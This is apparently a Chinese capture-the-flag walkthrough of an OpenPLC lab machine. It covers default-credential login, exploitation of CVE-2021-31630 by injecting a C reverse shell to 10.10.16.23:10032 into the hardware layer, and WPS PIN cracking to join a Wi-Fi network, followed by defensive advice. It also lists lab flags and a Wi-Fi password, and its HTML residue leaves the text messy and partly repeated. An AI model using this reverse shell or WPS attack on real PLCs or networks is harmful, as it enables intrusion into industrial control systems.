OpenPLC 渗透测试与无线网络接管实战指南<\/h1>

1. 目标识别与初始扫描<\/h2>

使用 Nmap 进行初始扫描：<\/p>

nmap -p- -sC -sV 10.10.11.7 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>2. OpenPLC 认证绕过<\/h2>


使用默认凭证登录 OpenPLC 系统：<\/p>

用户名：openplc<\/code><\/li>
密码：openplc<\/code><\/li>
<\/ul>
<\/li>

登录后导航至 Programs<\/code> 页面，该页面存在文件上传功能<\/p>
<\/li>
<\/ol>
3. ST 语言程序分析<\/h2>
ST (Structured Text) 是一种用于 PLC 编程的高级语言，类似 C 和 Pascal。示例程序结构：<\/p>
PROGRAM<\/span> job<\/span>
<\/span><\/span>VAR<\/span>
<\/span><\/span>    var_in<\/span> :<\/span> BOOL<\/span>;
<\/span><\/span>    var_out<\/span> :<\/span> BOOL<\/span>;
<\/span><\/span>END_VAR<\/span>
<\/span><\/span>    var_out<\/span> :=<\/span> var_in;
<\/span><\/span>END_PROGRAM<\/span>
<\/span><\/span>
<\/span><\/span>CONFIGURATION<\/span> Config0<\/span>
<\/span><\/span>    RESOURCE<\/span> Res0<\/span> ON<\/span> PLC<\/span>
<\/span><\/span>        TASK<\/span> Main<\/span>(INTERVAL<\/span> :=<\/span> T<\/span>#<\/span>50ms<\/span>,<\/span> PRIORITY<\/span> :=<\/span> 0<\/span>);
<\/span><\/span>        PROGRAM<\/span> start<\/span> WITH<\/span> Main<\/span> :<\/span> job<\/span>;
<\/span><\/span>    END_RESOURCE<\/span>
<\/span><\/span>END_CONFIGURATION<\/span>
<\/span><\/span><\/code><\/pre>关键组件：<\/p>

PROGRAM<\/code> 声明是 ST 语言的规范要求<\/li>
CONFIGURATION<\/code> 定义 PLC 配置<\/li>
RESOURCE<\/code> 指定资源分配<\/li>
TASK<\/code> 定义任务周期和优先级<\/li>
<\/ul>
4. 漏洞利用 (CVE-2021-31630)<\/h2>


上传恶意 ST 文件：<\/p>

文件内容包含后门代码<\/li>
通过 Programs<\/code> 页面上传<\/li>
<\/ul>
<\/li>

修改 Hardware 配置插入恶意代码：<\/p>
<\/li>
<\/ol>
#include<\/span> "ladder.h"<\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/socket.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <netinet\/in.h><\/span>
<\/span><\/span><\/span>#include<\/span> <arpa\/inet.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> initCustomLayer<\/span>(){}
<\/span><\/span>void<\/span> updateCustomIn<\/span>(){}
<\/span><\/span>
<\/span><\/span>void<\/span> updateCustomOut<\/span>() {
<\/span><\/span>    int<\/span> port =<\/span> 10032<\/span>;
<\/span><\/span>    struct<\/span> sockaddr_in revsockaddr;
<\/span><\/span>    int<\/span> sockt =<\/span> socket(AF_INET, SOCK_STREAM, 0<\/span>);
<\/span><\/span>    revsockaddr.sin_family =<\/span> AF_INET;
<\/span><\/span>    revsockaddr.sin_port =<\/span> htons(port);
<\/span><\/span>    revsockaddr.sin_addr.s_addr =<\/span> inet_addr("10.10.16.23"<\/span>);
<\/span><\/span>    connect(sockt, (struct<\/span> sockaddr *<\/span>) &<\/span>revsockaddr, sizeof<\/span>(revsockaddr));
<\/span><\/span>    dup2(sockt, 0<\/span>);
<\/span><\/span>    dup2(sockt, 1<\/span>);
<\/span><\/span>    dup2(sockt, 2<\/span>);
<\/span><\/span>    char<\/span> *<\/span> const<\/span> argv[] =<\/span> {"\/bin\/sh"<\/span>, NULL};
<\/span><\/span>    execve("\/bin\/sh"<\/span>, argv, NULL);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>代码分析：<\/p>

创建反向 shell 连接到攻击者机器 (10.10.16.23:10032)<\/li>
dup2<\/code> 调用将标准输入、输出和错误重定向到套接字<\/li>
execve<\/code> 执行 \/bin\/sh<\/code> 提供交互式 shell<\/li>
<\/ul>
5. 权限提升与用户标志获取<\/h2>

获取用户标志：<\/li>
<\/ol>
cat \/root\/user.txt
<\/span><\/span># 输出: fa96bfd0991067bd5612c26372c0e379<\/span>
<\/span><\/span><\/code><\/pre>6. 无线网络接管<\/h2>
6.1 WPS PIN 码破解<\/h3>
使用 OneShot 工具进行 WPS PIN 码破解：<\/p>
.\/oneshot -i wlan0 -b 02:00:00:00:02:00 -K
<\/span><\/span><\/code><\/pre>6.2 无线网络配置<\/h3>

编辑 WPA 配置：<\/li>
<\/ol>
vim \/etc\/wpa_supplicant\/wpa_supplicant-wlan0.conf
<\/span><\/span><\/code><\/pre>配置文件内容：<\/p>
ctrl_interface=\/var\/run\/wpa_supplicant
ctrl_interface_group=0
update_config=1
network={
    ssid="plcrouter"
    psk="NoWWEDoKnowWhaTisReal123!"
    key_mgmt=WPA-PSK
    proto=WPA2
    pairwise=CCMP TKIP
    group=CCMP TKIP
    scan_ssid=1
}
<\/code><\/pre>

网络接口配置：<\/li>
<\/ol>
vim \/etc\/systemd\/network\/25-wlan.network
<\/span><\/span><\/code><\/pre>内容：<\/p>
[Match]
Name=wlan0
[Network]
DHCP=ipv4
<\/code><\/pre>

重启服务：<\/li>
<\/ol>
systemctl enable wpa_supplicant@wlan0.service
<\/span><\/span>systemctl restart systemd-networkd.service
<\/span><\/span>systemctl restart wpa_supplicant@wlan0.service
<\/span><\/span><\/code><\/pre>7. Root 标志获取<\/h2>
成功连接无线网络后获取 root 标志：<\/p>
82c3c9d3e55882fbbb91e73aea962d67
<\/code><\/pre>
关键点总结<\/h2>

OpenPLC 默认凭证利用<\/li>
ST 程序结构理解与恶意文件构造<\/li>
CVE-2021-31630 漏洞手工利用<\/li>
PLC 硬件配置注入反向 shell<\/li>
WPS PIN 码破解技术<\/li>
Linux 无线网络配置与管理<\/li>
系统服务重启与网络连接建立<\/li>
<\/ol>
防御建议<\/h2>

修改 OpenPLC 默认凭证<\/li>
限制文件上传功能<\/li>
更新 OpenPLC 到最新版本<\/li>
禁用 WPS 功能或使用强 PIN 码<\/li>
实施网络隔离，限制 PLC 网络访问权限<\/li>
<\/ol>

OpenPLC 渗透测试与无线网络接管实战指南<\/h1>

6. 无线网络接管<\/h2>

防御建议<\/h2> 修改 OpenPLC 默认凭证<\/li> 限制文件上传功能<\/li> 更新 OpenPLC 到最新版本<\/li> 禁用 WPS 功能或使用强 PIN 码<\/li> 实施网络隔离，限制 PLC 网络访问权限<\/li> <\/ol>

防御建议<\/h2>

修改 OpenPLC 默认凭证<\/li>
限制文件上传功能<\/li>
更新 OpenPLC 到最新版本<\/li>
禁用 WPS 功能或使用强 PIN 码<\/li>
实施网络隔离，限制 PLC 网络访问权限<\/li> <\/ol>